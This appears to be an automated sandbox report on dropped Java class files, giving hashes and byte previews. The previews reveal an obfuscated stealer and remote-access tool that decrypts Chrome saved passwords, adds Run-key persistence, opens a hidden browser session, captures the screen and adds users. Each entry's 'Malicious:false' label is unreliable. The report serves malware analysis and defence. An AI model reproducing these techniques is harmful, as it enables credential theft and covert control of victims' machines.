                        Preview:.......4.M..>..?..@..A..F..G..J..K..5..8..9..:..B..C..D..E....#....%....&...."..............!....$.............. ....'..1.)..1./..1.0..7....;.*..<.-..<.5..=.(..H.6..I.3..L.(...()Ljava/lang/String;...()V...()Z...()[Ljava/io/File;..+(LcarLambo/DZQmNBgOWWDUGcQCKUlPSbuRpohqT;)V...(Ljava/io/File;Ljava/io/File;)V..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V...([Ljava/lang/String;)V...<init>...Code...Ljava/lang/String;...StackMapTable...[Ljava/io/File;...[Ljava/lang/String;...append..&carLambo/DZQmNBgOWWDUGcQCKUlPSbuRpohqT..$carLambo/hSQNXYaWyFQzecPOHvVddvqXyqC.. carLambo/qvNsplybcQmnatGjnQTThBZ...exists...gQEuyVcYntwPXTysEtfquh...getAbsolutePath..Qhttps://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar..Yhttps://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar..Ghttps://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar..Whttps://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdb
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1442
                        Entropy (8bit):5.919841242525247
                        Encrypted:false
                        Malicious:false
                        Preview:.......4.U..0..7..8..=..>..?..@..A..B..C..F..G..H..M..N..O....(....#....$....%....(....)....*....+....,....-.........(...."....'...."....&..../..6.2..:.<..;.<..D.<..E.3..I.4..J.<..K.<..L.<..P.<..Q.<..R.<..S.<..T.1..."encrypted_key":"([^,]*)"...()Ljava/lang/String;...()V..-(Ljava/lang/String;)Ljava/lang/StringBuilder;..9(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;...<clinit>...<init>...AES/GCM/NoPadding...Chrome Not Installed...Code...GYDTPVEwzYqRTvxmvHtRLJG...GeLuFwhdbiiEVoEeoUbtXxPX...Ljava/lang/String;...No passwords Found...SELECT * FROM logins;..$URL:%s..Username:%s..Password:%s.......Unable to decode..!Your OS (%s) is not supported! :(..1\Local\Google\Chrome\User Data\Default\Login Data..*\Local\Google\Chrome\User Data\Local State...akllnBiTjwPmAwfMbajsTFm...append..&carLambo/BAvsXDspdJYXQBvXhSPZNfejgtqGP..%carLambo/ETIKYbEhuMLgDjIJSHDmGnlmeMsm..$carLambo/toANhLheFpVIBJATjkPJUTCvbMu...format...gQEuyVcYntwPXTysEtfquh...gcLmiwpDoXkEofFgIgnkAFbECjBM...ghKDbwZCNsgFCyEcTHO
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):3885
                        Entropy (8bit):6.084158537403049
                        Encrypted:false
                        Malicious:false
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):254
                        Entropy (8bit):5.154915202643433
                        Encrypted:false
                        Malicious:false
                        Preview:.......4..............(Lcom/sun/jna/platform/win32/WinDef$HDC;IIIILcom/sun/jna/platform/win32/WinDef$HDC;IILcom/sun/jna/platform/win32/WinDef$DWORD;)Z...BitBlt...carLambo/GDI32.. com/sun/jna/platform/win32/GDI32...java/lang/Object........................
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):4501
                        Entropy (8bit):6.006768237470638
                        Encrypted:false
                        Malicious:false
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):5778
                        Entropy (8bit):5.978892450138961
                        Encrypted:false
                        Malicious:false
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):4725
                        Entropy (8bit):5.641819388945017
                        Encrypted:false
                        SSDEEP:48:0+NzlnfCvKCvvCvvCvGCvlCvXCvmCvECvcCviCv+ICv0BCviCv0sY36CvaCviCvU:zF1hh1/HPuHp98KFW3WmV8IZp
                        MD5:DE53C45EF1C763D42F69C48C072D49AC
                        SHA1:53D1BCDADA3047C8C2E35032E17B411C3854A5AE
                        SHA-256:C2E5EB5EB758AE93BDAF240985773F1A9FB54B290CA3C53700454D0720464486
                        SHA-512:FDA01DAC7ECF0B30EF8C1428C6E73649A2DEC8847AEFDD16AF132A5463F2F02CACA93463D88D1D5C50DEAA9FADA1FB7DB8C8F402DB52D9C66F676600196BA33A
                        Malicious:false
                        Preview:.......4................................................C....O....U....D....I....8....H....3....S....Q....3....P....T....4....@....B....R....5....6....7....9....:....?....J....;....<....=....>....A....E....F....G....K....L....M....N..r.W..s.]..u.\..v.Z..w._..x....y.[..z.k..{.l..|.p..}.i..~.a....^....a....i....j..............e....g....f..............`....d....c....h....b.........o....V....X....m....q........()Ljava/lang/String;...()V...(BBII)V...(Lcom/sun/jna/platform/win32/WinDef$HBITMAP;)Z..P(Lcom/sun/jna/platform/win32/WinDef$HDC;)Lcom/sun/jna/platform/win32/WinDef$HDC;..*(Lcom/sun/jna/platform/win32/WinDef$HDC;)Z..V(Lcom/sun/jna/platform/win32/WinDef$HDC;II)Lcom/sun/jna/platform/win32/WinDef$HBITMAP;...(Lcom/sun/jna/platform/win32/WinDef$HDC;IIIILcom/sun/jna/platform/win32/WinDef$HDC;IILcom/sun/jna/platform/win32/WinDef$DWORD;)Z...(Lcom/sun/jna/platform/win32/WinDef$HDC;Lcom/sun/jna/platform/win32/WinDef$HBITMAP;IILcom/sun/jna/Pointer;Lcom/sun/jna/platform/win32/WinGDI$BITMAPINFO;I)
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1494
                        Entropy (8bit):5.7699615403562365
                        Encrypted:false
                        SSDEEP:24:kitlX3rUjvsyCvG1yEoOQ2CJqNM5AtqtikaJvg+Xyl:kiLX7UjvsyCu1FQ2AqNM5xa1g+Cl
                        MD5:F87072AB9D6E400199D0EEDCFDDCD0AF
                        SHA1:3BF4D151E2EDD2EBE72D9B24307389BBEDF49F29
                        SHA-256:FA77E43538637ED3025C94D75E6B92C7711B92C169852D847A21A0607D3834BC
                        SHA-512:50ECF6A766867D30F2D34B0CF51F09AC0ABE53D1A7738E2530D44B783DA9FB708DC58C4C1501D720ADF312ABA216F694B6740961E5EE646024202BB42196159E
                        Malicious:false
                        Preview:.......4.b..4..5..B..D..H..L..X..a..I..K..P..Q..R..S..T..U..V..W....*....&....-....,....%....$....+....'.........0....)..../....1....3....$....(....2..C.9..C.:..C.;..C.A..J.=..M.<..N.F..O.6..Y.9..Z.8..[.@..\.?..].7..^.>.._.8..`.8...........()Ljava/io/InputStream;...()Ljava/lang/Process;...()Ljava/lang/String;...()V...(Ljava/io/InputStream;)V...(Ljava/io/Reader;)V...(Ljava/lang/Object;)Z..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)Z..'(Ljava/lang/String;)[Ljava/lang/String;...(Z)Ljava/lang/ProcessBuilder;...([Ljava/lang/String;)V.../c...<init>...=...Code...Ljava/lang/String;...StackMapTable...VolumeSerialNumber...[Ljava/lang/String;...append...carLambo/HRvrZvbQXOxdQCpuCvMoA...cmd.exe...equals...gQEuyVcYntwPXTysEtfquh...getInputStream...java/io/BufferedReader...java/io/IOException...java/io/InputStreamReader...java/lang/Object...java/lang/Process...java/lang/ProcessBuilder...java/lang/String...java/lang/StringBuilder...null...printStackTrace...readLine...redirec
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1112
                        Entropy (8bit):5.803264203787311
                        Encrypted:false
                        SSDEEP:24:RK6ERApSCvWL9aCvW63y1fDnCvWF1SgK7xACvWxCvWmQCz5UEN5Vxk9c/:KESCvg9aCvxACvQ19K7xACvgCvWmQCzP
                        MD5:7A12A2C338CCA99D8D61057ADD1B95DC
                        SHA1:495391FE279F0C3FBFBEEBF12F10839D8243077F
                        SHA-256:F9AF7C59C95B8264FDEFA78737C0652A768D4E076D201FFF2A3C43EEDF5BE9AD
                        SHA-512:E650A3D348667F189B9EBA86E34B5242AB0A943917363336697AC0FC56E3BF7830C89D832E09292B374AF4632BD4CF1988968CD319900873531092E4FD315048
                        Malicious:false
                        Preview:.......4.=...../..0..1..2..3..4..8..9....................................................%....5.#..6."..6.'..6.(..7....:.*..:.+..;.)..<.$...()V...()Z..-(LcarLambo/RestoreWindow;Ljava/lang/String;)V..@(Lcom/sun/jna/platform/win32/WinDef$HWND;Lcom/sun/jna/Pointer;)Z...(Lcom/sun/jna/platform/win32/WinDef$HWND;[BI)I...(Ljava/lang/CharSequence;)Z...([B)Ljava/lang/String;...<init>...Code...I...LcarLambo/HBrowserNativeApis;...LcarLambo/RestoreWindow;..(Lcom/sun/jna/platform/win32/WinDef$HWND;...Ljava/lang/String;...StackMapTable...callback...carLambo/HBrowserNativeApis...carLambo/INziJWwhFRZYUTzXNlVz...carLambo/RestoreWindow...com/sun/jna/Native...com/sun/jna/Pointer..&com/sun/jna/platform/win32/WinDef$HWND...com/sun/jna/platform/win32/WinUser$WNDENUMPROC...contains...gQEuyVcYntwPXTysEtfquh...isEmpty...java/lang/Object...java/lang/String...nnHRYoAONroTDXAkGOnAtRE...qvNsplybcQmnatGjnQTThBZ...toString.0.............6.'.....:.+.....;.).......%. ...&... ........*+...*,...*...*............-.!...&.
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):9091
                        Entropy (8bit):6.0640873642400415
                        Encrypted:false
                        SSDEEP:192:QUK63+wh+25483dxtMgarANL2PFX++/0w+OK0ogy0JVHrrzZTSZV0Jv:Q+48txtMrrI2PQa0wBvoqJVLrTJv
                        MD5:4232BB01ED6F761EF18D1360F3331181
                        SHA1:F7CAF441F309AD89A1B787F736380F0610F622F2
                        SHA-256:CBE99E10CE8BA786BF6E11A393F1786DBF4B8E1E2BF7E7FAF1B93313E5CC4880
                        SHA-512:0FA9CA3CEFCE07B4CD6C6F4EB92AA8FAEF426F3A07EDF7812131C7E3B8897817DA187C75D41165EBBFB1248716676120D13A17CE998DB13EC1DC989B8088329B
                        Malicious:false
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):393
                        Entropy (8bit):5.457670755253947
                        Encrypted:false
                        SSDEEP:12:FbCoy12+q9WuJSrqqFnxaJtRl9/LqkM50:Fbhy15qBSzQHz9bM50
                        MD5:7F7957B5C353A805D2FA6DC0B7A18778
                        SHA1:29CEDCC5D10D338292878F447A3179E04845B625
                        SHA-256:84F45DC097AD9E82B8EC15BCFB92012C81586DB79B858DA9762DCFAC624FAEA2
                        SHA-512:1EB62AD2C20D51DA46F3AB341BF5C051D3DDA76A36FB6218DFA53C6948860941A8A5EC9B209B2DDF9DA29F7D564025C3A11157824DE2BAF5E3BFD7AC8A335EB4
                        Malicious:false
                        Preview:.......4...............................................()V..%(LcarLambo/lXFRxTmUHAVtXyFTZbpbiXx;)V...<init>...Code.."LcarLambo/lXFRxTmUHAVtXyFTZbpbiXx;..'carLambo/JMrXOwDACcclgsrbfAOpFrHXlamCDQ.. carLambo/lXFRxTmUHAVtXyFTZbpbiXx...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..........................................*+...*..............................*.............
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):240
                        Entropy (8bit):5.275971282267533
                        Encrypted:false
                        SSDEEP:6:+liUwCvUB2JjGaS+Xz8XfpEf2UwCjvRPYklQe2:+PwCvK2JSaS+Xz8XfE9wCjvRj2
                        MD5:629406C3A190F005DB7C4910CB4B4985
                        SHA1:EB09EA68C77AA2201AA28ABF9D559C601B6E2478
                        SHA-256:EDC583512463B1F42CA8D7F1702DE9CDC8505BF856BEDDFF2BBBF2EB2640632D
                        SHA-512:63AA683932108298B466EC7AF9E6CAB66B6CB9302186DE07578609BCB0D00B503E242BEDDD18458A8F262B5B0E6E4DCA6F0CBEC4E92842648CE718B27BAD9147
                        Malicious:false
                        Preview:.......4.............,(Lcom/sun/jna/platform/win32/WinNT$HANDLE;)Z...Wow64DisableWow64FsRedirection...Wow64RevertWow64FsRedirection...carLambo/Kernel32..#com/sun/jna/platform/win32/Kernel32...java/lang/Object................................
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1945
                        Entropy (8bit):5.860763009318161
                        Encrypted:false
                        SSDEEP:24:OarcJ32b2RYSFyQy1cAEoWMVEGKZSpYwbptHTVQYohzT5DVGMgLC0+gtFZk5LWIK:8x2bsaEHMZKspdTTVQTzT5DVY+EKx1wx
                        MD5:BE9D39C334B0009681FBFC4A2512E495
                        SHA1:B5D4A968FEE2C676F5DD20E1CC60B8B553FE2933
                        SHA-256:84C294E0B35CC564EAD58DD077A12EAD0BCD3A0F584BC44E3413EF69BDB94AD6
                        SHA-512:4624D9864433951649A927F5A258C40FB263C7226DF7CC52AA05A74370299A70F2A98C312E2BBB46639FA2475E0B3B9B21C5619185A9D3C7A450774CB97034C6
                        Malicious:false
                        Preview:.......4..............I..W..^..c..p..z..d..e..f..g..h..i..j..k..q..r..s..t..u..v..w..x..y.............>....7....E....D....6....8....;....<....=....B....5....:....?....C....C....4....A....G....4....5....9....H....@....F..X.K..X.V..Z.K..].`..a.K..b.U..l.L..m.O..m.P..m.R..m.[..n.J..o.T..{.S..|.M..}.K..~.J....\....Q....N....J..."...()Ljava/lang/String;...()V...()Z...(I)Ljava/lang/String;...(II)Ljava/lang/String;..:(ILjava/lang/String;Ljava/lang/String;I)Ljava/lang/String;..;(ILjava/lang/String;Ljava/lang/String;Ljava/lang/String;I)V...(J)V...(Ljava/io/File;Ljava/io/File;)V...(Ljava/lang/String;)I..&(Ljava/lang/String;)Ljava/lang/String;..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V.......<init>...Code...GYDTPVEwzYqRTvxmvHtRLJG...I...Ljava/lang/String;...QsNkSlGCqFomtjHlHdgKKJlOETn..-Software\Microsoft\Windows\CurrentVersion\Run...StackMapTable...Z...akllnBiTjwPmAwfMbajsTFm...append...bin...carLambo/FirstRun.. carLambo/ISyzDWggemUZimyTYMwRRfQ.."carLambo/LZFZUTettLT
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):2350
                        Entropy (8bit):5.750026922291392
                        Encrypted:false
                        SSDEEP:48:8I7rrRoxV7Bdnf2MGXw6QZ3wZFs+k3iJ4RXxDRNnQGlLvjp1tfEHmzTzA3UDJqHG:pyv9dnOxA1Z3wbkyJ2XVnhVs2zA3UD8m
                        MD5:A027DBF130695F3D0AFDF154359A33CC
                        SHA1:0CFDDFBBF9EC43490BE88091F2D5BF0C69AEDB1E
                        SHA-256:164ED5D49B9900E96EFC01DB31A48D4C7F00C25B4EFFE8FEF1AC22C5EF4B163E
                        SHA-512:470DBF543C33C84B1FC38069EE788D797DDBDCF193AFD62FB40FA0267E5D7BF02609A13A863F32E4437FAEED6112896E12660E04E7744718BA43DE5AD1F68638
                        Malicious:false
                        Preview:.......4....{...............................................................................................~.....!.E..!.F..!.G..!.H..!.I..!.J..!.K..!.L..!.M..!.N..!.O..!.P..!.Q..!.R..!.S..!.T..!.U..!.V..!.W..!.X..!.Y..!.Z..!.[..!.\..!.]..!.^..!._..!.`..!.a..!.b..!.c..!.d..".D..g.e..h.r..i.r..j.r..k.r..m.r..n.r..o.r..p.r..s.r..t.r..u.r..v.r..w.r..x.r..y.r..z.r..|.r..}.r....r....r....r....r....r....r....r....r....r....r....r....r....r....r...()V...<clinit>...<init>...AimdQBqtwmRlTmfOwmvjwNywPJZsM...CHHXGzeSpzwiJOAtZoSZBJ...CHHXGzeSpzwiJOAtZoSZBJOdYDRcQU...CMGnAzOSNTsjXgAokPsrvtqOAexQi...Code...GYDTPVEwzYqRTvxmvHtRLJG...GeLuFwhdbiiEVoEeoUbtXxPX...HRvrZvbQXOxdQCpuCvMoA...ISyzDWggemUZimyTYMwRRfQ...LZFZUTettLTuEIERFOckFPlpH...Ljava/lang/String;...OeziLNfIzXyeUUtuiOSPKlGvibRk...PWjvaMJuUYJDdBdFIQec...QsNkSlGCqFomtjHlHdgKKJlOETn...SjomlJrGISDYNqiAAulMONOv...TQaTMIBufeXwulTTDuvpxBTBfNW...TgBoQLFFtKbHGgBZrVBiDrm...YEJPIdRNPZsBIbCpFLfaCVN...akllnBiTjwPmAwfMbajsTFm...all-pass...bQOGTazZDTmWsQIjxo
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):411
                        Entropy (8bit):5.53599982011939
                        Encrypted:false
                        SSDEEP:6:Fb2U3jsAfanRViyEy4y15xfanRViyAqZyqkz7ZfanRViyJQnxaJ2qRPt+NclVXiw:FbzyEhy1zyAqGhyJQnxaJtRl9/LqkM50
                        MD5:B1666AA954F8D6D86D5E48F587C92E15
                        SHA1:9FB8FC155332C4A475AA41F955EBDE12010E9186
                        SHA-256:AD08BA96288E69752F6487014AD05E7BF9518E92FF1B087C4E0933E604B65BB1
                        SHA-512:F2E78E36748F2A980ABC89EB24F861E633186F4BBEAD8AFB7EF983EB69102DCCCF99901472AA0134F5F82C706D791D447614E2651FB143105A28C90BCE19BD72
                        Malicious:false
                        Preview:.......4...............................................()V..+(LcarLambo/XfrcwHiEekkBljrjyatNOjRICOGWh;)V...<init>...Code..(LcarLambo/XfrcwHiEekkBljrjyatNOjRICOGWh;..'carLambo/MMpWpSYgqriSzVphTpNfhnTglQdmfQ..&carLambo/XfrcwHiEekkBljrjyatNOjRICOGWh...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..........................................*+...*..............................*.............
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):487
                        Entropy (8bit):5.652598149535544
                        Encrypted:false
                        SSDEEP:12:gMHYMjQBjs/MJy1aLjoj31FnxaJtRlMAMiGMZ:gMH5GDy1S0LQHzH7GW
                        MD5:596961025A3960FBDE01A503B7E17FB1
                        SHA1:FB8C93756247198612A6BC906E327B50F057D318
                        SHA-256:97593741B627DE53F0AFB35FD1E9CF40C7212A2FC1DE13BACEA330CFF58DB102
                        SHA-512:E50E190CB73967356A6F7B4AD9E7928ECCBB88FE2E43BF2A23F0061EC1F1ACDECEB14EDCB74CEDF801C776DA1E958A7197A25BFA88CB480C95E3F87F6879829F
                        Malicious:false
                        Preview:.......4............................................................()V..$(LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;)V..6(LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;Ljava/lang/String;)V...<init>...Code...Initializing HRDP..!LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;...carLambo/CHHXGzeSpzwiJOAtZoSZBJ..%carLambo/OeziLNfIzXyeUUtuiOSPKlGvibRk...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..........................................*+...*..............................*........*.............
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):6418
                        Entropy (8bit):6.0848527629034255
                        Encrypted:false
                        SSDEEP:96:JU7B5SVg0NUqzGFOb8V37d+e4RFLmdmFCQOFVko3ghaLTwqcskiMd4:/Vg0LyG+5KLCmFNO/gWTXcskiC4
                        MD5:6655492D2107A409D5F5FC25CC0BA27E
                        SHA1:613FBF72F76DE4BACA8C304BDCBADEDA5DD74096
                        SHA-256:B86B5B24B3739EA5F16F574C4C37AD23E83698AD58219D2E92A47AF15BAD1AF4
                        SHA-512:DEDBC394F82E331F61BA62D17E29DA9718CF2888B1C7AF190D20CAA7259E314085705DBBF5838D72327CE8029EDBBE2BF258DBAFA7DD3FDFC85324B0279289F0
                        Malicious:false
                        Preview:.......4.C.... .........................................................................................&..-..5..:..;..?..@..A................................................................. ..!.."..#..$..%..)....)....)....-....-....-....-....0....2....@....*....,....,....,....,....,....,........./....1....1....1....2....2....2....2....2....2....2....2....3....4....6....6....7....8....8....9....;....<....=....=....=....>....>....>....>....>....>....>....>....>....>....>....?....?....?....?....A....A....+....+..........................................................................................................................................................'....(....)....*....+........./....0....0....0....1....2....3....4....6....7....8....9....9....<....=....>....B............. ... /add... /delete..."..." -i -o..." -u...'" delete...()I...()Ljava/io/InputStream;...()Ljava/lang/Process;...()Ljava/lang/String;...()V...()Z...()[Ljava/lang/String;...(I)I...(I)Ljava/lang/String;...(II)L
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):402
                        Entropy (8bit):5.599259175644478
                        Encrypted:false
                        SSDEEP:6:Fb2U3jsU1Q32bH4y1XT11Q32esUj/JGG1Q32wnxaJ2qRPt+NclVXi8BPmlknM50:FbfdbYy1bdPo4idwnxaJtRl9/LqkM50
                        MD5:0616D48F334A64092B2B8B3F731A64FD
                        SHA1:263F2BD831C9834C50F496A2304D2F779C5BACF9
                        SHA-256:8633A2E9F0A76161BFB9EBFABD503450A061C2E4D1008B6387EE3EF1C7504FD6
                        SHA-512:50E99136AA6BCEF0739214BD42BD80202F23764E4EA737EBF141E028360DB75B34FF1F07846C1500A7C33A41DF679C597EDB4953922181D7A07A01C10DAFEA47
                        Malicious:false
                        Preview:.......4...............................................()V..)(LcarLambo/pOkXJMhVItPChYeMRCPBQRAUzLx;)V...<init>...Code..&LcarLambo/pOkXJMhVItPChYeMRCPBQRAUzLx;..$carLambo/QsNkSlGCqFomtjHlHdgKKJlOETn..$carLambo/pOkXJMhVItPChYeMRCPBQRAUzLx...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..........................................*+...*..............................*.............
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):414
                        Entropy (8bit):5.518758942373546
                        Encrypted:false
                        SSDEEP:12:svUI2Moy12yYIhqqFnxaJtRloT/YuPkM50:SUI2Hy1JFxQHzoTAFM50
                        MD5:A0F599BF5B7B34EA839C35302CADE708
                        SHA1:F4E38FDBFB4633AED9D950472B515F6F9BF90ADF
                        SHA-256:7C13E0515A3E74484FA032E1D2DEBDD0B13039B748DF1A05E45F68F7220DE783
                        SHA-512:C2B7DF954098270CA838B8B6A80A39153713A60B77ED1C6F9AB00DAD882F88F81D328F20C7EC7408BE649F0D69876A65E7F07DE22D35201B1DC2FAC37E221997
                        Malicious:false
                        Preview:.......4...............................................()V..%(LcarLambo/lXFRxTmUHAVtXyFTZbpbiXx;)V...<init>...Code.."LcarLambo/lXFRxTmUHAVtXyFTZbpbiXx;.."carLambo/RGguaORgBxwLQFguOTfsyvWLb.. carLambo/lXFRxTmUHAVtXyFTZbpbiXx...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...nnHRYoAONroTDXAkGOnAtRE...run.0..........................................*+...*..............................*.............
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1781
                        Entropy (8bit):5.887160291644172
                        Encrypted:false
                        SSDEEP:48:2gzDqo6oz9wCvYCvbzCvgCvzCvWq9hUXKCvewACvgaV6QiVMFV3/XDgEj1:NDPf9gYQXDp5
                        MD5:B8ADD848609F10EE28E961C11F721FDE
                        SHA1:F0C12B5AE915181847CFBFBAC524228F3DC5631E
                        SHA-256:BF2369EB64AFA4D0A1973D76F608AB5B6498F86131297AAC615B5771F72C585F
                        SHA-512:32F71594A9834FE01FDED7A2753A7306E99E2A3167CB7E30E8A82EE13082CC1A68DBB60362CC39AB132F382799760B8FBC325A2F71EDF63F23F0B01F34F91951
                        Malicious:false
                        Preview:.......4.e..D..E..F..G..I..N..P..W..Q..R..S..T..U..Y..Z..[..\..]..^.............2....3....4....(....-........./....0....)....(....1....,....*....5....(....+....7....6..H.9..H.<..H.=..H.C..V.:..X.>..X.?..X.@..X.A..X.B..X.K..`.L..a.M..b.B..c.;..d.8...()Ljava/lang/Process;...()V...(I)Lcom/sun/jna/Pointer;...(J)V..-(LcarLambo/RestoreWindow;Ljava/lang/String;)V...(Lcom/sun/jna/Pointer;)V..,(Lcom/sun/jna/platform/win32/WinDef$HWND;I)Z..-(Lcom/sun/jna/platform/win32/WinDef$HWND;II)I..X(Lcom/sun/jna/platform/win32/WinDef$HWND;Lcom/sun/jna/platform/win32/WinDef$HWND;IIIII)Z..H(Lcom/sun/jna/platform/win32/WinUser$WNDENUMPROC;Lcom/sun/jna/Pointer;)Z...(Ljava/lang/String;)V...([Ljava/lang/String;)V...--disable-audio...--mute-audio...--new-window...--window-position=1280,720...<init>..5C:\Program Files\Google\Chrome\Application\chrome.exe...Code...LcarLambo/HBrowserNativeApis;..(Lcom/sun/jna/platform/win32/WinDef$HWND;...Ljava/io/PrintStream;...Restored...StackMapTable...Strigoi Browser...carLambo/
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):124
                        Entropy (8bit):5.217588851004168
                        Encrypted:false
                        SSDEEP:3:DbllEFlY8NVmQPFPi6/cOnQl9xUDJC1qQCK8P5GxgGn:8rrP9AOnQnxaJ2qRP5VG
                        MD5:87CD6EE81D513F43AB8DC52EAE1181F4
                        SHA1:90AF51C60729F29EC295A776F81AC82729933E51
                        SHA-256:EC9E3DC65978F375EC7DFACEF3E86AF504BC07E82B5FB9E370F75F684CBEFEBF
                        SHA-512:1170602BCD531C975CCED9AB22FA2CD0612782E68D1F1A41F3DA45E4F781EAFD8E7D1EA6452899524E04C1B231B896F81427C0DB855FAA87B17F32E7E803CEE5
                        Malicious:false
                        Preview:.......4...........()V..!carLambo/SjomlJrGISDYNqiAAulMONOv...gQEuyVcYntwPXTysEtfquh...java/lang/Object......................
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):3902
                        Entropy (8bit):5.91301457892101
                        Encrypted:false
                        SSDEEP:96:3RweI6Urn0rlUnoA9K1p8WXN6HBu8E1reciKL:3RXUT0rl8Gr0h9E1SE
                        MD5:2CB7EC37D42AF36D1D8C4F0007F6CF93
                        SHA1:3D7BCB35B26E971798DD46A653DD3247993296C3
                        SHA-256:94E5E63367D0187C20C6AA9F19F1FB1FA48BF11FAD9E74E779C470B6690192B4
                        SHA-512:27481425784BB459A211F7D70E5FFD2E320D0E3553C2FA3194B6E7DD813FEEFF5B0936F85E2AFC2E64BD75CCBED7DF280834F982DB9AFEFCD4AC64239F92E220
                        Malicious:false
                        Preview:.......4.........................................................................................................Z....c....f....O....N....V....Y....W....X....e....N....T....]....L....R....g....L....]....K....h....j....K....Q....k....^....K....\....a.. .N..!.M..!.R..!.S..!.U..!.d..!.l...._....b....P....[....`....i....r....u....x....~.........z....|....r....r....s....r....q....v....w..............t....}....o....{....s....p.........n..............o..............y....m.........o........()I...()Ljava/lang/Object;...()Ljava/lang/String;...()Ljava/util/Iterator;...()Ljava/util/List;...()V...()Z...(I)Ljava/lang/Object;...(Ljava/io/File;)V..>(Ljava/io/File;Ljava/io/File;Ljava/io/File;)Ljava/lang/String;..;(Ljava/io/FileInputStream;Ljava/util/zip/ZipOutputStream;)V...(Ljava/io/OutputStream;)V..D(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;...(Ljava/lang/Object;)Z..&(Ljava/lang/String;)Ljava/lang/String;..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):317
                        Entropy (8bit):5.465614600175668
                        Encrypted:false
                        SSDEEP:6:kPjxLssW4y1XTaxAUlYXMO8EDyAPXUnxaJ2qRP53zXMsUXVlk/Ov0lqoqDVX:esYy1DUIMO9vvUnxaJtRF7MsUXVlV0sT
                        MD5:BC1336A2A8F98BCB0D599C8026363E1E
                        SHA1:780C34F33FFE9BFA75EA7F8489DB561A6B5926C1
                        SHA-256:112387821BA39051BED56EC710732D2021C551ADFF61FC6CF6F820F0A47520AF
                        SHA-512:93E7BFB3DEB29924DF157A8AD0BD3F61648CD453E14DD419A2CFB4DF03375AAFEC3B5F3E987FC1FCE7DE15356A6AEE2A674A2C5B32605E55C9F30A40C4031244
                        Malicious:false
                        Preview:.......4..................................()V...<init>...Code..&LcarLambo/wvGnyIgrUOTdXfGRPmvbIDXjmea;...[Ljava/lang/String;.. carLambo/TgBoQLFFtKbHGgBZrVBiDrm...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/String...nnHRYoAONroTDXAkGOnAtRE.0................................................*...*..............
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):320
                        Entropy (8bit):5.376457698926428
                        Encrypted:false
